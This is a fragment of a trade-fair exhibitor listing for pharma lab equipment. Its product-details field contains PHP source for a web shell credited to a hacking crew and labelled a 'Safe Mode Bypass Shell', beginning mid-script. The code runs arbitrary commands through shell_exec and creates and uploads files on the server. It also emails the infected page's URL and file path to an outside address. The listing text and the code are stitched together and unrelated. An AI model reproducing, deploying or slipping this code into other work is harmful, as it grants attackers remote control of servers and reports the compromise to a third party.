Booth No.:
Product Category: Pharma Lab Equipments
Product Details:
Error: Cannot change directory!
\n";
}
} else {
$dir_error = "Error: The directory doesn't exists.
\n";
}
} elseif(isset($dir_keep)) {
if(file_exists($dir_keep)) {
if(function_exists("chdir")) {
@chdir($dir_keep);
$dir_cur = getcwd();
} else {
$dir_error = "Error: Cannot change directory!
\n";
}
} else {
$dir_error = "Error: The directory doesn't exists.
\n";
}
}
# This execute the command specified
if(isset($cmd_check)) {
if(@function_exists("shell_exec")) {
$exec = $cmd_cnt;
$tmpfile = tempnam('/tmp', $shell_title);
$exec .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
$cmd_out = `$exec`;
} else {
die("ERROR: the PHP version running doesn't support `shell_exec()`! Upgrade it!\n");
}
}
# Creates files
if(isset($mkfile_path)) {
if(!file_exists($mkfile_path)) {
if($mkfile_new = @fopen($mkfile_path, "w")) {
@fputs($mkfile_new, $mkfile_cnt);
@fclose($mkfile_new);
$mkfile_msg = "New file created: " . $mkfile_path . "
\n";
} else {
$mkfile_msg = "Error: Permission denied!
\n";
}
} else {
$mkfile_msg = "Error: The file already exists.
\n";
}
}
# Uploads files
if(isset($upfile_path)) {
$upfile_name = $_FILES["upfile"]["name"];
if(trim($_FILES["upfile"]["name"]) == "") {
$upfile_msg = "Error: specify a file please.
\n";
} else {
if(@is_uploaded_file($_FILES["upfile"]["tmp_name"])) {
if(@move_uploaded_file($_FILES["upfile"]["tmp_name"], "$upfile_path/$upfile_name"))
$upfile_msg = "New file uploaded successfully!
\n";
else
$upfile_msg = "Error: Permission denied!
\n";
} else {
$upfile_msg = "Error: Cannot upload the file!
\n";
}
}
}
if(!$shell_mode) {
?>
NO© 2009 echo $shell_title . " " . $shell_version; ?> - Improved By ViRuS_HiMa @
Hell ZoNe CreW
SloGan is
// Safe Mode Bypass Shell
// On php 5.2.x
$site = "www.Hell-z0ne.org";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
$to = "virusxhima@gmail.com";
$subject = "Contact me";
$header = "from: Mail Me ";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
}
?>
} elseif(isset($shell_mode)) {
switch($shell_mode) {
case 'phpinfo':
phpinfo();
break;
default:
break;
}
} else {
header("Location: " . $PHP_SELF);
}
ob_end_flush();
?>